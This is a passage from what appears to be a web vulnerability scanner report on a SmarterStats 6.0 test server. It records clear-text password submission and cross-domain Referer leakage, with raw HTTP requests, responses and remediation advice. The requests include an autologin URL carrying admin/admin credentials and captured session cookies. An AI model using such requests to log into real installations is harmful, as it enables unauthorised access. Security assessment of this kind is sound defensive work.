<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$TPH$UpdatePanel3','','tctl00$MPH$UpdatePanel5',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Users
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>


           </div>
           <div class="ButtonBarRight">
               
<div id="ctl00_BrPH_btnCancel" class="BBButton"><a class="ButtonBarAnchor" href="frmUsers&#x2e;aspx" onclick="window.location.href = 'frmUsers\x2easpx'; return false;" tabindex='0'><span class="BBInner">Cancel</span></a></div>

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           
<div id="ctl00_TPH_UpdatePanel3">
   

<!-- HyperTabStrip -->
   <div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>User</span></span></a></li>
       <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Report Options</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   

</div>

       </div>
       <div id="Scrollable" class="ContentDiv">
           
<div id="ctl00_MPH_UpdatePanel5">
   

<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_UserTab" />

<div id='ctl00_MPH_UserTab' class='' >
           <span id="ctl00_MPH_UserTab">
<table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtUserName">
                   <td id="ctl00_MPH_txtUserName_Label" class="Indent Fixed">Username</td><td id="ctl00_MPH_txtUserName_Setting" class="Setting"><input name="ctl00$MPH$txtUserName_SettingText" type="text" id="ctl00_MPH_txtUserName_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_txtNewPassword">
                   <td id="ctl00_MPH_txtNewPassword_Label" class="Indent Fixed">Password</td><td id="ctl00_MPH_txtNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtNewPassword_SettingText" type="password" id="ctl00_MPH_txtNewPassword_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_txtNewPasswordConfirmed">
                   <td id="ctl00_MPH_txtNewPasswordConfirmed_Label" class="Indent Fixed">Confirm Password</td><td id="ctl00_MPH_txtNewPasswordConfirmed_Setting" class="Setting"><input name="ctl00$MPH$txtNewPasswordConfirmed_SettingText" type="password" id="ctl00_MPH_txtNewPasswordConfirmed_SettingText" class="text" autocomplete="off" /></td>
               </tr><tr id="ctl00_MPH_chkDomainAdmin">
                   <td id="ctl00_MPH_chkDomainAdmin_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkDomainAdmin_Setting" class="Setting"><input id="ctl00_MPH_chkDomainAdmin_SettingCheck" type="checkbox" name="ctl00$MPH$chkDomainAdmin_SettingCheck" /><label for="ctl00_MPH_chkDomainAdmin_SettingCheck">Mark as Administrator</label></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_ReportOptionsTab' class='' style='display:none'>
           <span id="ctl00_MPH_ReportOptionsTab">
<table class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstDefaultDateRange">
                   <td id="ctl00_MPH_lstDefaultDateRange_Label" class="Indent Fixed">Default Date Range</td><td id="ctl00_MPH_lstDefaultDateRange_Setting" class="Setting"><select name="ctl00$MPH$lstDefaultDateRange_SettingDropDown" id="ctl00_MPH_lstDefaultDateRange_SettingDropDown">
                       <option value="Today">Today</option>
                       <option value="Yesterday">Yesterday</option>
                       <option selected="selected" value="Last7Days">Last 7 Days</option>
                       <option value="WeekToDate">Week to Date</option>
                       <option value="Last30Days">Last 30 Days</option>
                       <option value="MonthToDate">Month to Date</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstDefaultRows">
                   <td id="ctl00_MPH_lstDefaultRows_Label" class="Indent Fixed">Default Report Rows</td><td id="ctl00_MPH_lstDefaultRows_Setting" class="Setting"><select name="ctl00$MPH$lstDefaultRows_SettingDropDown" id="ctl00_MPH_lstDefaultRows_SettingDropDown">
                       <option value="10">10</option>
                       <option selected="selected" value="25">25</option>
                       <option value="50">50</option>
                       <option value="100">100</option>
                       <option value="500">500</option>
                       <option value="1000">1000</option>
                       <option value="2000">2000</option>
                       <option value="3000">3000</option>
                       <option value="4000">4000</option>
                       <option value="5000">5000</option>
                       <option value="6000">6000</option>
                       <option value="7000">7000</option>
                       <option value="8000">8000</option>
                       <option value="9000">9000</option>
                       <option value="10000">10000</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_lstSeoReportCharts">
                   <td id="ctl00_MPH_lstSeoReportCharts_Label" class="Indent Fixed">SEO Report Charts</td><td id="ctl00_MPH_lstSeoReportCharts_Setting" class="Setting"><select name="ctl00$MPH$lstSeoReportCharts_SettingDropDown" id="ctl00_MPH_lstSeoReportCharts_SettingDropDown">
                       <option value="none">None</option>
                       <option selected="selected" value="all">All</option>
                       <option value="trendonly">Trend Reports Only</option>

                   </select></td>
               </tr><tr id="ctl00_MPH_chkResolveIps">
                   <td id="ctl00_MPH_chkResolveIps_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkResolveIps_Setting" class="Setting"><input id="ctl00_MPH_chkResolveIps_SettingCheck" type="checkbox" name="ctl00$MPH$chkResolveIps_SettingCheck" /><label for="ctl00_MPH_chkResolveIps_SettingCheck">Enable IP address resolution</label></td>
               </tr><tr id="ctl00_MPH_chkAutoGenerate">
                   <td id="ctl00_MPH_chkAutoGenerate_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkAutoGenerate_Setting" class="Setting"><input id="ctl00_MPH_chkAutoGenerate_SettingCheck" type="checkbox" name="ctl00$MPH$chkAutoGenerate_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkAutoGenerate_SettingCheck">Generate reports automatically on page load</label></td>
               </tr>
           </table>
</span></div>
       

</div>
   

</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmuser', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

<script type="text/javascript">
function refresh() {
parent.location.href = '../default.aspx?area=userskin';
}
</script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmUser\x2easpx?'); });
$('#ctl00_MPH_txtNewPassword_SettingText').val('');
$('#ctl00_MPH_txtNewPasswordConfirmed_SettingText').val('');
$(function() { SetTopTitle('Users'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_UserTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_ReportOptionsTab"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Username","vcID":"ctl00_MPH_txtUserName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmMustMatch_txt']='Must match {0}';
$(function() {$vc({"lt":"Confirm Password","vcID":"ctl00_MPH_txtNewPasswordConfirmed_SettingText","VMs":["vmMustMatch"],"VPs":{"vmRequired":false,"vmMustMatch":"\u003cfont color=red\u003e[@NewPassword]\u003c/font\u003e","vmMustMatchField":"ctl00_MPH_txtNewPassword_SettingText"}},false);});
//]]>
</script>
</form>
</body>
</html>


4.5. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Login.aspx?shortcutLink=autologin&txtSiteID=admin&txtUser=admin&txtPass=admin HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:28:41 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; path=/; HttpOnly
Set-Cookie: SelectedLanguage=; expires=Sat, 10-Oct-2020 03:28:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8885



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="Login.aspx?shortcutLink=autologin&amp;txtSiteID=admin&amp;txtUser=admin&amp;txtPass=admin" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMjU1NDEwNjEyDxYEHhBfX19SZXN1bHRGYWlsdXJlBStTaXRlIElELCB1c2VybmFtZSBvciBwYXNzd29yZCBpcyBpbmNvcnJlY3QuHhBfX19SZXN1bHRTdWNjZXNzZRYCZg9kFgICAQ9kFgICBQ9kFgJmD2QWBgIDD2QWAgIBDxYCHgRUZXh0BU08ZGl2IGNsYXNzPSJUaXBUZXh0RmFpbHVyZSI+U2l0ZSBJRCwgdXNlcm5hbWUgb3IgcGFzc3dvcmQgaXMgaW5jb3JyZWN0LjwvZGl2PmQCBQ9kFgICDQ8QDxYCHwIFC1JlbWVtYmVyIG1lZGRkZAIHD2QWBgIBDxBkEBUCFFVzZSBCcm93c2VyIExhbmd1YWdlB0VuZ2xpc2gVAgACZW4UKwMCZ2cWAWZkAgMPDxYCHgtOYXZpZ2F0ZVVSTAVjaHR0cDovL2hlbHAuc21hcnRlcnRvb2xzLmNvbS9TbWFydGVyU3RhdHMvdjYvZGVmYXVsdC5hc3B4P3A9VSZ2PTYuMC4zOTMyJmxhbmc9ZW4tVVMmcGFnZT1Mb2dpbkFkbWluZGQCBw8PFgIeCEltYWdlVXJsBQYvcy5naWZkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUWY3RsMDAkTVBIJGNoa0F1dG9Mb2dpbgUXY3RsMDAkQlBIJGJ0bkVudGVyQ2xpY2t6/zu2kQq0AGA1NGEQuLPtp+INf25i9ldPE2hT29rBcw==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>

<script language="javascript">window.onload = function() { if (document.getElementById('ctl00$MPH$txtSiteId') != null) document.getElementById('ctl00$MPH$txtSiteId').focus(); } </script>
<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>
<script src="/WebResource.axd?d=tmbPiP2D38VVojyjJVsEkXwe8X4rw_c60mStWfistR8pyJPOf4ElR79y8d6v9XE45y9Xuon7XBs01GFx3aJPBQ4-yv7YCKPFvc37E1RidaE1&amp;t=634219308989960000" type="text/javascript"></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1',''], [], [], 90, 'ctl00');
//]]>
</script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <div id="ctl00_UpdatePanel1">
   
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Site ID, username or password is incorrect.</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" value="admin" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="admin" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
       <option selected="selected" value="">Use Browser Language</option>
       <option value="en">English</option>

   </select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;U&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dU\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               

                   <script type="text/javascript">
                       $(document).ready(function() {
                           $('select').each(function() {
                               if ($(this).width() > 180) $(this).width(180);
                           });
                       }); </script>

               
           
</div>
       
   

<script type="text/javascript">
//<![CDATA[
WebForm_AutoFocus('ctl00_MPH_txtSiteId');//]]>
</script>
</form>
</body>
</html>


5. Cross-domain Referer leakage  previous  next
There are 6 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


5.1. http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmViewReports.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}
Content-Length: 6928

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTIyNzU0MjE4NQ8WBh4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg9yZXBvcnREaXNwbGF5ZWRnFgJmD2QWAgIBD2QWDAIDD2QWAgIBD2QWAgIBD2QWAmYPZBYIAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHhdDbGllbnRTaWRlU2NyaXB0T25DbGljawUSRW1haWxSZXBvcnRQb3B1cCgpZGQCBQ8PFgIfBAUTRXhwb3J0UmVwb3J0UG9wdXAoKWRkAgcPDxYCHwQFElByaW50UmVwb3J0UG9wdXAoKWRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFhoCAw8PFhAeDFNlbGVjdGVkRGF0ZQYAQH4OpTDNCB4HTWluRGF0ZQYAQMr4o%2BjgBx4HTWF4RGF0ZQYAAGjBKVyhCR4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeCENzc0NsYXNzBRJEYXRlUGlja2VyT3ZlcnJpZGUeBF8hU0ICAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR4NT3JpZ2luYWxWYWx1ZQUVMTAvMy8yMDEwIDEyOjAwOjAwIEFNHwYFEzIwMTAtMTAtMDMtMDAtMDAtMDAeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8KaB8IBgBAyvij6OAHZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawU8cmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9SYWRTdGFydERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhoFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK%2BKPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAIHDw8WEB8HBgDA%2BAxcNc0IHwgGAEDK%2BKPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8MBQxTbWFydGVyVG9vbHMfCQYAAGjBKVyhCR8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fBgUTMjAxMC0xMC0wOS0wMC0wMC0wMB8QBQdyaUxhYmVsHxFoHwpoHwgGAEDK%2BKPo4AdkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCA